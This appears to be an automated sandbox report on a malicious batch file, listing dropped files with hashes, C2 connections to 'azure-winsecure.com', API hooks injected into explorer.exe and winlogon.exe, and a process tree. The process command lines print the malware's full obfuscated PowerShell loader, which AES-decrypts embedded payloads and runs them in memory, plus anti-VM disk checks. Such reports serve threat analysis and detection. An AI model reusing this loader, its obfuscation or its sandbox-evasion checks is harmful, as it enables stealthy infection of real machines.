                            Preview:ElfChnk.....................................H...x....y......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.421206160086997
                            Encrypted:false
                            SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                            MD5:67CAD90771EBC0BD20736201D89C1586
                            SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                            SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                            SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                            Malicious:false
                            Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):69752
                            Entropy (8bit):4.432394242976953
                            Encrypted:false
                            SSDEEP:384:qqmooWsoIKo+xooWrooWlooWrooW2qsFRzBO2M7t5ZoqRMteoO1nRBocgTo+ryyM:iH+DemRngbe9R
                            MD5:EE8158B63D705FFF801B791B44016C44
                            SHA1:14CBFBAB6E6AA4DE6C3F4E286DBC7934D96742C3
                            SHA-256:87DE0FBF45D47322673770905464FB86C7D1858AB65BA73A33A12202AAC66BCE
                            SHA-512:0A13AE408DFCC92991F779E403B299BB3DC13E3728A78642768E21951EC5560E3DB4153500A11D32288963E4B227CB9BBC74297878FE857DB82B09F81AE8CBB1
                            Malicious:false
                            Preview:ElfChnk.........-.......U...........................N.k$.....................................................................2..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{........@..1.............>...............................................................F.............!....6.......... ..@..1.........O........t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.a.b.h.q.h.y.z.r.h.m.n.q.b.t...........%.%.8
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.418013163886424
                            Encrypted:false
                            SSDEEP:384:ZFR0Gu1Bb9w+1a7I+OkYDcND+S/qDhqqOc0qgfARMR2RvHeJvGAgXZIpURCOLiju:zC/JVMjynLmLQXHmtpJnqiNHpzoQp
                            MD5:9BDC273BED40B8666562C1CF55CF35AB
                            SHA1:C99C338E2B9DA3FEBE248763E66C4563B6155537
                            SHA-256:FC974E37E278EC66C1E07D4011E7CE0A54E7EFFADF9D6D565404F0161AD1913C
                            SHA-512:A44CA3655ABDE272ACB6261E7850256719366DDB509A0ADF5EFD0289B9A7642361FAEE0D6F903E1B477AA37C58D82B3DED121EEEC05BDA13E8CE69D246CA80B8
                            Malicious:false
                            Preview:ElfChnk.................m.......t...............`...P...........................................................................................,...s...h...............T...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m........g..0..........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):320504
                            Entropy (8bit):3.9318038850693373
                            Encrypted:false
                            SSDEEP:6144:UgfRHVgfRLgfR8VgfRBgfROgfRHVgfRLgfR8VgfRBgfR27aze3znaze2gfRHVgf1:
                            MD5:989FE11B6850F4E607A4BB44FE61EE3F
                            SHA1:3BE41878FD7BAACDE6262191CEFAB3482CF1C1CA
                            SHA-256:F4C05CF2479E1CEA9D7317E6ACFB8B91F6A3866CBBEC691090E100A1B3943172
                            SHA-512:08C945B764CA8D833ACEB8E648864A611B52B629BA9BD55E9801D61FFCB7A29732FCEFFADD1CB206D41B062C6FF9C6D654D9753DA976C767D32A20B064D5B796
                            Malicious:false
                            Preview:ElfChnk.....................................p.........?.....................................................................Z. ............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**................H"1..........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.4664723531859085
                            Encrypted:false
                            SSDEEP:6144:sIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:RXD94zWlLZMM6YFH6++
                            MD5:6C2338766D8478DF3B9442DF7361058B
                            SHA1:542BE768E8C7ADF462F6F6E80DA7E53FE7337AAE
                            SHA-256:730FA60EF15D586994FCE66B5D90A2B29E0F6117E8E2E78A9C56DA74FC212A6D
                            SHA-512:67840BB92130BDFC1733591A3596B45D599958638EE0C1F49E0B673FBA1781B0D72258483F429C5E2C51AC7300C55B4708095581A0FB79C6C93BEBE9A54AA64A
                            Malicious:false
                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..0...............................................................................................................................................................................................................................................................................................................................................t-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):85
                            Entropy (8bit):4.84935141926561
                            Encrypted:false
                            SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                            MD5:D8C4F9FD5B972AE487170EA993933179
                            SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                            SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                            SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                            Malicious:false
                            Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):2839
                            Entropy (8bit):5.269550461652421
                            Encrypted:false
                            SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
                            MD5:39401ABDD4A08EE5458DF7CB80F69CED
                            SHA1:A4F498F6E926AC3A23F561C1C582C51217FA9093
                            SHA-256:06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
                            SHA-512:7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
                            Malicious:false
                            Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc
                            File type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Entropy (8bit):6.008710946572079
                            TrID:
                            • BibTeX references (5501/1) 100.00%
                            File name:1.cmd
                            File size:5'214'429 bytes
                            MD5:19fc666f7494d78a55d6b50a0252c214
                            SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
                            SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
                            SHA512:94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            TLSH:8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
                            File Content Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq
                            Icon Hash:9686878b929a9886
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 4, 2024 09:43:11.225049973 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.229967117 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:11.230060101 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.238358021 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.243372917 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:32.616575003 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:32.616772890 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:32.623522043 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:32.628834009 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:36.349204063 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.358129025 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:36.359184027 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.361568928 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.374773979 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:57.712136030 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:57.712508917 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:57.712898016 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:57.717854977 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:01.113701105 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.119086981 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:01.119292974 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.119541883 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.124370098 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:22.509109020 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:22.509397030 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:33.882853031 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:33.888209105 CEST696950016192.64.119.55192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 4, 2024 09:43:11.203910112 CEST6273253192.168.2.41.1.1.1
                            Oct 4, 2024 09:43:11.218769073 CEST53627321.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 4, 2024 09:43:11.203910112 CEST192.168.2.41.1.1.10x3e9aStandard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 4, 2024 09:43:11.218769073 CEST1.1.1.1192.168.2.40x3e9aNo error (0)azure-winsecure.com192.64.119.55A (IP address)IN (0x0001)false

                            Code Manipulations

                            Function NameHook TypeActive in Processes
                            ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                            NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                            ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            NtResumeThreadINLINEexplorer.exe, winlogon.exe
                            RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:3
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:4
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:6
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:03:42:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
